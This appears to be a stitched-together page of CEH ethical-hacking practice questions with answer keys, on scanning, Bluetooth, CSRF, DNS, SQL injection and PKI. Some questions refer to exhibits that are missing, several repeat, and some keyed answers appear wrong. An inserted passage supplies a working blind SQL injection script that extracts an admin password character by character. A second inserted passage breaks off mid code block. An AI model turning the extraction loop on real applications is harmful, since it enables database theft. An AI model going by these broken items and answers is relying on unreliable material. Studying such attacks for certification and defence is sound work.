ceh 2

Uploaded by

alusegaudit

What is the most common method to exploit the "Bash Bug" or "Shellshock" vulnerability?

A. SYN Flood
B. SSH
C. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable Web server
D. Manipulate format strings in text fields

Which firewall evasion scanning technique makes use of a zombie system that has low network activity as well as its fragment identification numbers?

A. Decoy scanning
B. Packet fragmentation scanning
C. Spoof source address scanning
D. Idle scanning

The correct answer(s): D

Bob, a network administrator at BigUniversity, realized that some students are connecting their notebooks to the wired network to have Internet access. In the university campus, there are many Ethernet ports available for professors and authorized visitors but not for students. He identified this when the IDS alerted for malware activities in the network. What should Bob do to avoid this problem?

A. Disable unused ports in the switches
B. Separate students in a different VLAN
C. Use the 802.1x protocol
D. Ask students to use the wireless network

The correct answer(s): C

A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack?

A. Paros Proxy
B. BBProxy
C. Blooover
D. BBCrack

The correct answer(s): B

Which of the following is not a Bluetooth attack?

A. Bluedriving
B. Bluesmacking
C. Bluejacking
D. Bluesnarfing

The correct answer(s): A

An attacker changes the profile information of a particular user (victim) on the target website. The attacker uses this string to update the victim's profile to a text file and then submit the data to the attacker's database.

<iframe src="http://www.vulnweb.com/updateif.php" style="display:none"></iframe>

What is this type of attack (that can use either HTTP GET or HTTP POST) called?

A. Browser Hacking
B. Cross-Site Scripting
C. SQL Injection
D. Cross-Site Request Forgery

The correct answer(s): D

The network administrator at Spears Technology, Inc has configured the default gateway Cisco router's access-list as below:

You are hired to conduct security testing on their network. You successfully brute-force the SNMP community string using a SNMP crack tool. The access-list configured at the router prevents you from establishing a successful connection. You want to retrieve the Cisco configuration from the router. How would you proceed?

A. Use the Cisco's TFTP default password to connect and download the configuration file
B. Run a network sniffer and capture the returned traffic with the configuration file from the router
C. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router masking your IP address
D. Send a customized SNMP set request with a spoofed source IP address in the range -192.168.1.0

The correct answer(s): B D

Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small-sized packets to the target computer, making it very difficult for an IDS to detect the attack signatures. Which tool can be used to perform session splicing attacks?

A. tcpsplice
B. Burp
C. Hydra
D. Whisker

The correct answer(s): D

What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?

A. Copy the system files from a known good system
B. Perform a trap and trace
C. Delete the files and try to determine the source
D. Reload from a previous backup
E. Reload from known good media

The correct answer(s): E

Tony wants to integrate a 128-bit symmetric block cipher with key sizes of 128, 192, or 256 bits into a software program, which involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. Which of the following algorithms includes all the above features and can be integrated by Tony into the software program?

A. TEA
B. CAST-128
C. RC5
D. Serpent

The correct answer(s): D

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical information to Johnson's machine. What is the social engineering technique Steve employed in the above scenario?

A. Quid pro quo
B. Diversion theft
C. Elicitation
D. Phishing

The correct answer(s): A

A zone file consists of which of the following Resource Records (RRs)?

A. DNS, NS, AXFR, and MX records
B. DNS, NS, PTR, and MX records
C. SOA, NS, AXFR, and MX records
D. SOA, NS, A, and MX records

The correct answer(s): D

Tremp is an IT Security Manager, and he is planning to deploy an IDS in his small company. He is looking for an IDS with the following characteristics:
- Verifies success or failure of an attack
- Monitors system activities
- Detects attacks that a network-based IDS fails to detect
- Near real-time detection and response
- Does not require additional hardware
- Lower entry cost
Which type of IDS is best suited for Tremp's requirements?

A. Gateway-based IDS
B. Network-based IDS
C. Host-based IDS
D. Open source-based

The correct answer(s): C

You work for Acme Corporation as Sales Manager. The company has tight network security restrictions. You are trying to steal data from the company's Sales database (Sales.xls) and transfer it to your home computer. Your company filters and monitors traffic that leaves from the internal network to the Internet. How will you achieve this without raising suspicion?

A. Encrypt the Sales.xls using PGP and e-mail it to your personal gmail account
B. Package the Sales.xls using Trojan wrappers and telnet them back to your home computer
C. You can conceal the Sales.xls database in another file like photo.jpg or other files and send it out in an innocent-looking email or file transfer using Steganography techniques
D. Change the extension of Sales.xls to sales.txt and upload it as an attachment to your hotmail account

The correct answer(s): C

What does a firewall check to prevent particular ports and applications from getting packets into an organization?

A. Transport layer port numbers and application layer headers
B. Presentation layer headers and the session layer port numbers
C. Network layer headers and the session layer port numbers
D. Application layer port numbers and the transport layer headers

The correct answer(s): A

Which tier in the N-tier application architecture is responsible for moving and processing data between the tiers?

A. Presentation tier
B. Application Layer
C. Logic tier
D. Data tier

The correct answer(s): C

When considering how an attacker may exploit a web server, what is web server footprinting?

A. When an attacker implements a vulnerability scanner to identify weaknesses
B. When an attacker creates a complete profile of the site's external links and file structures
C. When an attacker gathers system-level data, including account details and server names
D. When an attacker uses a brute-force attack to crack a web-server password

The correct answer(s): B

Why should the security analyst disable/remove unnecessary ISAPI filters?

A. To defend against social engineering attacks
B. To defend against webserver attacks
C. To defend against jailbreaking
D. To defend against wireless attacks

The correct answer(s): B

Which regulation defines security and privacy controls for Federal information systems and organizations?

A. HIPAA
B. EU Safe Harbor
C. PCI-DSS
D. NIST-800-53

The correct answer(s): D

What port number is used by the LDAP protocol?

A. 110
B. 389
C. 464
D. 445

The correct answer(s): B

Geena, a cloud architect, uses a master component in the Kubernetes cluster architecture that scans newly generated pods and allocates a node to them. This component can also assign nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions. Which of the following master components is explained in the above scenario?

A. Kube-controller-manager
B. Kube-scheduler
C. Kube-apiserver
D. Etcd cluster

The correct answer(s): B

Which of the following tactics uses malicious code to redirect users' web traffic?

A. Spimming
B. Pharming
C. Phishing
D. Spear-phishing

The correct answer(s): B

Which of the following are well-known password-cracking programs?

A. L0phtcrack
B. NetCat
C. Jack the Ripper
D. Netbus
E. John the Ripper

The correct answer(s): A E

What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?

A. The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.
B. Reveals the daily outgoing message limits before mailboxes are locked
C. The internal command RCPT provides a list of ports open to message traffic.
D. A list of all mail proxy server addresses used by the targeted host

The correct answer(s): A

Although FTP traffic is not encrypted by default, which layer 3 protocol would allow for end-to-end encryption of the connection?

A. SFTP
B. IPsec
C. SSL
D. FTPS

The correct answer(s): B

An attacker can employ many methods to perform social engineering against unsuspecting employees, including scareware. What is the best example of a scareware attack?

A. A pop-up appears to a user stating, "You have won a free cruise! Click here to claim your prize!"
B. A banner appears to a user stating, "Your account has been locked. Click here to reset your password and unlock your account."
C. A banner appears to a user stating, "Your Amazon order has been delayed. Click here to find out your new delivery date."
D. A pop-up appears to a user stating, "Your computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue."

The correct answer(s): D

Matthew, a black hat, has managed to open a meterpreter session to one of the kiosk machines in Evil Corp's lobby. He checks his current SID, which is S-1-5-21-1223352397-1872883824-861252104-501. What needs to happen before Matthew has full administrator access?

A. He must perform privilege escalation.
B. He needs to disable antivirus protection.
C. He needs to gain physical access.
D. He already has admin privileges, as shown by the "501" at the end of the SID.

The correct answer(s): A

In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a list of employee and client email addresses and other related information by using various search engines, social networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a list of words from the target website to further perform a brute-force attack on the previously gathered email addresses. What is the tool used by Hailey for gathering a list of words from the target website?

A. Shadowsocks
B. CeWL
C. Psiphon
D. Orbot

The correct answer(s): B

Shiela is an information security analyst working at HiTech Security Solutions. She is performing service version discovery using Nmap to obtain information about the running services and their versions on a target system. Which of the following Nmap options must she use to perform service version discovery on the target host?

A. -sN
B. -sX
C. -sV
D. -sF

The correct answer(s): C

Jude, a pen tester, examined a network from a hacker's perspective to identify exploits and vulnerabilities accessible to the outside world by using devices such as firewalls, routers, and servers. In this process, he also estimated the threat of network security attacks and determined the level of security of the corporate network. What is the type of vulnerability assessment that Jude performed on the organization?

A. External assessment
B. Passive assessment
C. Host-based assessment
D. Application assessment

The correct answer(s): A

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization decided to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure?

A. Robotium
B. BalenaCloud
C. Flowmon
D. IntentFuzzer

The correct answer(s): C

Source: https://www.flowmon.com Flowmon empowers manufacturers and utility companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service continuity. This can be achieved by continuous monitoring and anomaly detection so that malfunctioning devices or security incidents, such as cyber espionage, zero-days, or malware, can be reported and remedied as quickly as possible.

Ben purchased a new smartphone and received some updates on it through the OTA method. He received two messages: one with a PIN from the network operator and another asking him to enter the PIN received from the operator. As soon as he entered the PIN, the smartphone started functioning in an abnormal manner. What is the type of attack performed on Ben in the above scenario?

A. Advanced SMS phishing
B. Bypass SSL pinning
C. Phishing
D. Tap 'n ghost attack

The correct answer(s): A

When configuring wireless on his home router, Javik disables SSID broadcast. He leaves authentication "open" but sets the SSID to a 32-character string of random letters and numbers. What is an accurate assessment of this scenario from a security perspective?

A. Since the SSID is required in order to connect, the 32-character string is sufficient to prevent brute-force attacks.
B. Disabling SSID broadcast prevents 802.11 beacons from being transmitted from the access point, resulting in a valid setup leveraging "security through obscurity".
C. It is still possible for a hacker to connect to the network after sniffing the SSID from a successful wireless association.
D. Javik's router is still vulnerable to wireless hacking attempts because the SSID broadcast setting can be enabled using a specially crafted packet sent to the hardware address of the access point.

The correct answer(s): C

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network. Which of the following host discovery techniques must he use to perform the given task?

A. UDP scan
B. TCP Maimon scan
C. ARP ping scan
D. ACK flag probe scan

The correct answer(s): C

This TCP flag instructs the sending system to transmit all buffered data immediately.

A. SYN
B. RST
C. PSH
D. URG
E. FIN

The correct answer(s): C

What two conditions must a digital signature meet?

A. Has to be the same number of characters as a physical signature and must be unique.
B. Has to be unforgeable, and has to be authentic
C. Must be unique and have special characters
D. Has to be legible and neat

The correct answer(s): B

If a token and 4-digit personal identification number (PIN) are used to access a computer system and the token performs off-line checking for the correct PIN, what type of attack is possible?

A. Birthday
B. Brute force
C. Man-in-the-middle
D. Smurf

The correct answer(s): B

Daniel is a professional hacker who is attempting to perform an SQL injection attack on a target website, www.movlescope.com. During this process, he encountered an IDS that detects SQL injection attempts based on predefined signatures. To evade any comparison statement, he attempted placing characters such as "' or '1'='1'" in any basic injection statement such as "or 1=1". Identify the evasion technique used by Daniel in the above scenario.

A. Null byte
B. IP fragmentation
C. Char encoding
D. Variation

The correct answer(s): D

Ron, a security professional, was pen testing web applications and SaaS platforms used by his company. While testing, he found a vulnerability that allows hackers to gain unauthorized access to API objects and perform actions such as view, update, and delete sensitive data of the company. What is the API vulnerability revealed in the above scenario?

A. Code injections
B. Improper use of CORS
C. No ABAC validation
D. Business logic flaws

The correct answer(s): B

A security analyst is performing an audit on the network to determine if there are any deviations from the security policies in place. The analyst discovers that a user from the IT department had a dial-out modem installed. Which security policy must the security analyst check to see if dial-out modems are allowed?

A. Firewall-management policy
B. Acceptable-use policy
C. Permissive policy
D. Remote-access policy

The correct answer(s): D

Sophia is a shopping enthusiast who spends significant time searching for trendy outfits online. Clark, an attacker, noticed her activities several times and sent a fake email containing a deceptive page link to her social media page displaying all-new and trendy outfits. In excitement, Sophia clicked on the malicious link and logged in to that page using her valid credentials. Which of the following tools is employed by Clark to create the spoofed email?

A. PyLoris
B. Slowloris
C. Evilginx
D. PLCinject

The correct answer(s): C

Calvin, a software developer, uses a feature that helps him auto-generate the content of a web page without manual involvement and is integrated with SSI directives. This leads to a vulnerability in the developed web application as this feature accepts remote user inputs and uses them on the page. Hackers can exploit this feature and pass malicious SSI directives as input values to perform malicious activities such as modifying and erasing server files. What is the type of injection attack Calvin's web application is susceptible to?

A. Server-side template injection
B. Server-side JS injection
C. CRLF injection
D. Server-side includes injection

The correct answer(s): D

Which of the following statements about a zone transfer is correct? (Choose three.)

A. A zone transfer is accomplished with the DNS
B. A zone transfer is accomplished with the nslookup service
C. A zone transfer passes all zone information that a DNS server maintains
D. A zone transfer passes all zone information that a nslookup server maintains
E. A zone transfer can be prevented by blocking all inbound TCP port 53 connections
F. Zone transfers cannot occur on the Internet

The correct answer(s): A C E

An Internet Service Provider (ISP) has a need to authenticate users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network. Which AAA protocol is the most likely able to handle this requirement?

A. TACACS+
B. DIAMETER
C. Kerberos
D. RADIUS

The correct answer(s): D

Which of the following viruses tries to hide from anti-virus programs by actively altering and corrupting the chosen service call interruptions when they are being run?

A. Macro virus
B. Stealth/Tunneling virus
C. Cavity virus
D. Polymorphic virus

The correct answer(s): B

The following is an entry captured by a network IDS. You are assigned the task of analyzing this entry. You notice the value 0x90, which is the most common NOOP instruction for the Intel processor. You figure that the attacker is attempting a buffer overflow attack. You also notice "/bin/sh" in the ASCII part of the output. As an analyst, what would you conclude about the attack?

A. The buffer overflow attack has been neutralized by the IDS
B. The attacker is creating a directory on the compromised machine
C. The attacker is attempting a buffer overflow attack and has succeeded
D. The attacker is attempting an exploit that launches a command-line shell

The correct answer(s): D

Alice needs to send a confidential document to her coworker, Bryan. Their company has public key infrastructure set up. Therefore, Alice both encrypts the message and digitally signs it. Alice uses _______ to encrypt the message, and Bryan uses _______ to confirm the digital signature.

A. Bryan's public key; Bryan's public key
B. Alice's public key; Alice's public key
C. Bryan's private key; Alice's public key
D. Bryan's public key; Alice's public key

The correct answer(s): D

PKI uses public-key cryptography, which is widely used on the Internet to encrypt messages or authenticate message senders. In public-key cryptography, a CA generates public and private keys with the same algorithm simultaneously. The private key is held only by the subject (user, company, or system) mentioned in the certificate, while the public key is made publicly available in a directory that all parties can access. The subject keeps the private key secret and uses it to decrypt the text encrypted by someone else using the corresponding public key (available in a public directory). Thus, others encrypt messages for the user with the user's public key, and the user decrypts them with his/her private key.

Gavin owns a white-hat firm and is performing a website security audit for one of his clients. He begins by running a scan which looks for common misconfigurations and outdated software versions. Which of the following tools is he most likely using?

A. Nikto
B. Nmap
C. Metasploit
D. Armitage

The correct answer(s): B

Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual tower to interrupt the data transmission between the user and the real tower, attempting to hijack an active session upon receiving the user's request. Bobby manipulated the traffic with the virtual tower and redirected the victim to a malicious website. What is the attack performed by Bobby in the above scenario?

A. Wardriving
B. KRACK attack
C. Jamming signal attack
D. aLTEr attack

The correct answer(s): D

Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth?

A. Bluesmacking
B. Bluebugging
C. Bluejacking
D. Bluesnarfing

The correct answer(s): D

Bluesnarfing is the unauthorized access of information from a wireless device through a Bluetooth connection, often between phones, desktops, laptops, and PDAs (personal digital assistants).

What is the way to decide how a packet will move from an untrusted outside host to a protected inside host that is behind a firewall, which permits the hacker to determine which ports are open and if the packets can pass through the packet filtering of the firewall?

A. Session hijacking
B. Firewalking
C. Man-in-the-middle attack
D. Network sniffing

The correct answer(s): B


How is the public key distributed in an orderly, controlled fashion so that the users can be sure of the sender's identity?

A. Hash value
B. Private key
C. Digital signature
D. Digital certificate

The correct answer(s): D

You are a Network Security Officer. You have two machines. The first machine (192.168.0.99) has snort installed, and the second machine (192.168.0.150) has kiwi syslog installed. You perform a syn scan in your network, and you notice that kiwi syslog is not receiving the alert message from snort. You decide to run wireshark on the snort machine to check if the messages are going to the kiwi syslog machine. What Wireshark filter will show the connections from the snort machine to the kiwi syslog machine?

A. tcp.srcport == 514 && ip.src == 192.168.0.99
B. tcp.srcport == 514 && ip.src == 192.168.150
C. tcp.dstport == 514 && ip.dst == 192.168.0.99
D. tcp.dstport == 514 && ip.dst == 192.168.0.150

The correct answer(s): D

Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the target's MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?

A. Cloud hopper attack
B. Cloud cryptojacking
C. Cloudborne attack
D. Man-in-the-cloud (MITC) attack

The correct answer(s): A

You are trying to break into a highly classified top-secret mainframe computer with the highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words, you are trying to penetrate an otherwise impenetrable system. How would you proceed?

A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network
B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"
D. Try to conduct a Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

The correct answer(s): B

Let's imagine three companies (A, B and C), all competing in a challenging global environment. Company A and B are working together in developing a product that will generate a major competitive advantage for them. Company A has a secure DNS server while company B has a DNS server vulnerable to spoofing. With a spoofing attack on the DNS server of company B, company C gains access to outgoing e-mails from company B. How do you prevent DNS spoofing?

A. Install DNS logger and track vulnerable packets
B. Disable DNS timeouts
C. Install DNS Anti-spoofing
D. Disable DNS Zone Transfer

The correct answer(s): C

Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL https://xyz.com/feed.php?url:externaIsile.com/feed/to to obtain a remote feed and altered the URL input to the local host to view all the local resources on the target server. What is the type of attack Jason performed in the above scenario?

A. Website defacement
B. Server-side request forgery (SSRF) attack
C. Web server misconfiguration
D. Web cache poisoning attack

The correct answer(s): B

Bob, a system administrator at TPNQM SA, concluded one day that a DMZ
is not needed if he properly configures the firewall to allow access
only to the servers/ports that may have direct Internet access and to
block access to workstations. Bob also concluded that a DMZ makes sense
only when a stateful firewall is available, which is not the case at
TPNQM SA. In this context, what can you say?

A. Bob can be right since a DMZ does not make sense when combined with a
stateless firewall

B. Bob is partially right. He does not need to separate networks if he
can create rules by destination IPs, one by one

C. Bob is totally wrong. A DMZ is always relevant when the company has
Internet servers and workstations

D. Bob is partially right. A DMZ does not make sense when a stateless
firewall is available

The correct answer(s): C

David is a security professional working in an organization, and he is
implementing a vulnerability management program in the organization to
evaluate and control the risks and vulnerabilities in its IT
infrastructure. He is currently executing the process of applying fixes
on vulnerable systems to reduce the impact and severity of
vulnerabilities. Which phase of the vulnerability-management life cycle
is David currently in?

A. Verification

B. Risk assessment

C. Vulnerability scan

D. Remediation

The correct answer(s): D

Which definition among those given below best describes a covert
channel?

A. A server program using a port that is not well known.

B. Making use of a protocol in a way it is not intended to be used.

C. It is the multiplexing taking place on a communication link.

D. It is one of the weak channels used by WEP which makes it insecure.

The correct answer(s): B

You need a tool that can do network intrusion prevention and intrusion
detection, function as a network sniffer, and record network activity.
What tool would you most likely select?

A. Nmap

B. Cain & Abel

C. Nessus

D. Snort

The correct answer(s): D

Session splicing is an IDS evasion technique in which an attacker
delivers data in multiple, small-sized packets to the target computer,
making it very difficult for an IDS to detect the attack signatures.
Which tool can be used to perform session splicing attacks?

A. tcpsplice

B. Burp

C. Hydra

D. Whisker

The correct answer(s): D

Henry is a penetration tester who works for XYZ organization. While
performing enumeration on a client organization, he queries the DNS
server for a specific cached DNS record. Further, by using this cached
record, he determines the sites recently visited by the organization's
users. What is the enumeration technique used by Henry on the
organization?

A. DNS zone walking

B. DNS cache snooping

C. DNSSEC zone walking

D. DNS cache poisoning

The correct answer(s): B

Which technique determines how a packet will move from an untrusted
outside host to a protected host behind a firewall, permitting the
hacker to determine which ports are open and whether packets can pass
through the firewall's packet filtering?

A. Session hijacking

B. Firewalking

C. Man-in-the-middle attack

D. Network sniffing

The correct answer(s): B

Gerard, a disgruntled ex-employee of Sunglass IT Solutions, targets
this organization to perform sophisticated attacks and bring down its
reputation in the market. To launch the attack process, he performed
DNS footprinting to gather information about DNS servers and to
identify the hosts connected in the target network. He used an
automated tool that can retrieve information about DNS zone data
including DNS domain names, computer names, IP addresses, DNS records,
and network Whois records. He further exploited this information to
launch other sophisticated attacks. What is the tool employed by Gerard
in the above scenario?

A. Knative

B. zANTI

C. Towelroot

D. Bluto

The correct answer(s): D

(https://www.darknet.org.uk/2017/07/bluto-dns-recon-zone-transfer-brute-forcer/)
"Attackers also use DNS lookup tools such as DNSdumpster.com, Bluto,
and Domain Dossier to retrieve DNS records for a specified domain or
hostname. These tools retrieve information such as domains and IP
addresses, domain Whois records, DNS records, and network Whois
records." CEH Module 02 Page 138

A large mobile telephony and data network operator has a data center
that houses network elements. These are essentially large computers
running on Linux. The perimeter of the data center is secured with
firewalls and IPS systems. What is the best security policy concerning
this setup?

A. Network elements must be hardened with user IDs and strong
passwords. Regular security tests and audits should be performed.

B. As long as the physical access to the network elements is
restricted, there is no need for additional measures.

C. There is no need for specific security measures on the network
elements as long as firewalls and IPS systems exist.

D. The operator knows that attacks and downtime are inevitable and
should have a backup site.

The correct answer(s): A

Ethical hacker Jane Smith is attempting to perform an SQL injection
attack. She wants to test the response time of a true or false response
and wants to use a second command to determine whether the database
will return true or false results for user IDs. Which two SQL injection
types would give her the results she is looking for?

A. Out-of-band and boolean-based

B. Time-based and union-based

C. Union-based and error-based

D. Time-based and boolean-based

The correct answer(s): D
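Boolean-based blind SQL injection in working form, added here as an example (it is not from the original question bank): a deliberately vulnerable lookup over an in-memory SQLite database constructed inline, a true/false oracle built on it, and the character-by-character extraction loop, beside the parameterized fix. The time-based variant Jane also wants differs only in the oracle: instead of "did a row come back", the signal is a delay (`SLEEP()` in MySQL, `pg_sleep()` in PostgreSQL, `WAITFOR DELAY` in MSSQL); SQLite has no sleep function, so only the boolean oracle is run here. Table contents, names and the endpoint are assumptions.

```python
import sqlite3

# Constructed target: an in-memory database standing in for the application's backend.
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
_conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                  [(1, "admin", "s3cret!"), (2, "jane", "hunter2")])
ORACLE_CALLS = {"count": 0}  # how many requests the extraction needed


def user_exists_vulnerable(user_id: str) -> bool:
    """Injectable endpoint: the user ID is concatenated into the SQL. It reveals
    nothing but whether a row came back, which is exactly what blind SQLi needs."""
    ORACLE_CALLS["count"] += 1
    sql = "SELECT id FROM users WHERE id = " + user_id
    return _conn.execute(sql).fetchone() is not None


def user_exists_safe(user_id: str) -> bool:
    """The fix: a bound parameter, so the input can never change the query's structure."""
    row = _conn.execute("SELECT id FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


def ask(condition: str) -> bool:
    """Boolean oracle: 'does row 1 exist AND does <condition> hold?'"""
    return user_exists_vulnerable(f"1 AND ({condition})")


def extract_string(subquery: str, max_len: int = 64) -> str:
    """Recover the value of an arbitrary scalar subquery one character at a time.
    Each character is found by binary search over its code point (7 questions for
    ASCII) instead of one question per candidate character."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not ask(f"LENGTH(({subquery})) >= {pos}"):
            break  # past the end of the string
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


def dump_admin_password() -> str:
    """The attack end to end: ~8 requests per character of the admin password."""
    return extract_string("SELECT password FROM users WHERE name = 'admin'")
```

The binary search is what makes blind injection practical: a 7-character value costs about 57 requests rather than several hundred, and the same loop works for a time-based oracle by replacing the true/false signal in `ask()` with a measured delay.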

Which type of virus can change its own code and then cipher itself
multiple times as it replicates?

A. Stealth virus

B. Tunneling virus

C. Cavity virus

D. Encryption virus

The correct answer(s): D

Why are containers less secure than virtual machines?

A. The host OS of containers has a larger attack surface.

B. Containers may fill up the host's disk space.

C. A compromised container may cause CPU starvation on the host.

D. Containers are attached to the same virtual network.

The correct answer(s): A

What useful information is gathered during a successful Simple Mail
Transfer Protocol (SMTP) enumeration?

A. The two internal commands VRFY and EXPN provide a confirmation of
valid users, email addresses, aliases, and mailing lists.

B. Reveals the daily outgoing message limits before mailboxes are
locked.

C. The internal command RCPT provides a list of ports open to message
traffic.

D. A list of all mail proxy server addresses used by the targeted host.

The correct answer(s): A

Which of the following web vulnerabilities would an attacker be
attempting to exploit if they delivered the following input?

A. XXE

B. SQLi

C. IDOR

D. XSS

The correct answer(s): A

The establishment of a TCP connection involves a negotiation called
the three-way handshake. What type of message does the client send to
the server in order to begin this negotiation?

A. ACK

B. SYN

C. RST

D. SYN-ACK

The correct answer(s): B

Based on the below log, which of the following sentences is true?

Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15 - 22 tcp_ip

A. Application is FTP and 10.240.250.23 is the client and
10.249.253.15 is the server.

B. Application is SSH and 10.240.250.23 is the server and
10.249.253.15 is the client.

C. SSH communications are encrypted; it's impossible to know who is
the client or the server.

D. Application is SSH and 10.240.250.23 is the client and
10.249.253.15 is the server.

The correct answer(s): D

What did the following commands determine?

A. That the Joe account has a SID of 500

B. These commands demonstrate that the guest account has NOT been
disabled

C. These commands demonstrate that the guest account has been disabled

D. That the true administrator is Joe

E. Issued alone, these commands prove nothing

The correct answer(s): D

Which of the following is the BEST way to defend against network
sniffing?

A. Using encryption protocols to secure network communications

B. Register all machines' MAC addresses in a centralized database

C. Use static IP addresses

D. Restrict physical access to server rooms hosting critical servers

The correct answer(s): A

To protect networks from sniffing attacks, organizations and individual
users should keep away from applications using insecure protocols, like
basic HTTP authentication, File Transfer Protocol (FTP), and Telnet.
Instead, secure protocols such as HTTPS, Secure File Transfer Protocol
(SFTP), and Secure Shell (SSH) should be preferred. In case there is a
necessity for using any insecure protocol in any application, all the
data transmission should be encrypted. If required, VPNs (Virtual
Private Networks) can be used to provide secure access to users. NOTE: I
want to note that the wording "best option" is valid only for the
EC-Council's exam since the other options will not help against sniffing
or will only help against some specific attack vectors. The sniffing
attack surface is huge. To protect against it, you will need to
implement a complex of measures at all levels of abstraction and apply
controls at the physical, administrative, and technical levels.
However, encryption is indeed the best option of all: even if your data
is intercepted, an attacker cannot understand it.
https://en.wikipedia.org/wiki/Sniffing_attack

Which of the following tools are used for enumeration? (Choose three.)

A. SolarWinds

B. USER2SID

C. Cheops

D. SID2USER

E. DumpSec

The correct answer(s): B D E

From the following table, identify the wrong answer in terms of
Range (ft).

Standard           Range (ft)
802.11a            150-150
802.11b            150-150
802.11g            150-150
802.16 (WiMax)     30 miles

A. 802.16 (WiMax)

B. 802.11g

C. 802.11b

D. 802.11a

The correct answer(s): A

Hackers often raise the trust level of a phishing message by modeling
the email to look similar to the internal email used by the target
company. This includes using logos, formatting, and names of the target
company. The phishing message will often use the name of the company
CEO, President, or Managers. The time a hacker spends performing
research to locate this information about a company is known as?

A. Exploration

B. Investigation

C. Reconnaissance

D. Enumeration

The correct answer(s): C

The security team of Debry Inc. decided to upgrade Wi-Fi security to
thwart attacks such as dictionary attacks and key recovery attacks. For
this purpose, the security team started implementing cutting-edge
technology that uses a modern key establishment protocol called
Simultaneous Authentication of Equals (SAE), also known as the
Dragonfly key exchange, which replaces the PSK concept. What is the
Wi-Fi encryption technology implemented by Debry Inc.?

A. WEP

B. WPA

C. WPA2

D. WPA3

The correct answer(s): D

When conducting a penetration test, it is crucial to use all means to
get all available information about the target network. One of the
ways to do that is by sniffing the network. Which of the following
cannot be performed by passive network sniffing?

A. Identifying operating systems, services, protocols and devices

B. Modifying and replaying captured network traffic

C. Collecting unencrypted information about usernames and passwords

D. Capturing network traffic for further analysis

The correct answer(s): B

An incident investigator asks to receive a copy of the event logs from
all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on
the network of an organization that has experienced a possible breach
of security. When the investigator attempts to correlate the
information in all of the logs, the sequence of many of the logged
events does not match up. What is the most likely cause?

A. The network devices are not all synchronized.

B. Proper chain of custody was not observed while collecting the logs.

C. The attacker altered or erased events from the logs.

D. The security breach was a false positive.

The correct answer(s): A

Many network and system administrators don't pay enough attention to
system clock accuracy and time synchronization. Computer clocks can run
faster or slower over time, batteries and power sources die, or
daylight-saving time changes are forgotten. Sure, there are many more
pressing security issues to deal with, but not ensuring that the time
on network devices is synchronized can cause problems, and these
problems often only come to light after a security incident. If you
suspect a hacker is accessing your network, for example, you will want
to analyze your log files to look for any suspicious activity. If your
network's security devices do not have synchronized times, the
timestamps' inaccuracy makes it impossible to correlate log files from
different sources. Not only will you have difficulty in tracking
events, but you will also find it difficult to use such evidence in
court; you won't be able to illustrate a smooth progression of events
as they occurred throughout your network.
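The correlation failure described above, as an added example that is not part of the original page: three constructed log lines (not real data) from a firewall on NTP, a proxy whose clock runs three minutes slow and an IDS whose clock runs two minutes fast. Sorted by their own timestamps the tool download appears before the intrusion it followed; once each source's measured offset is applied the sequence makes sense. The line format, the offsets and the source names are assumptions.

```python
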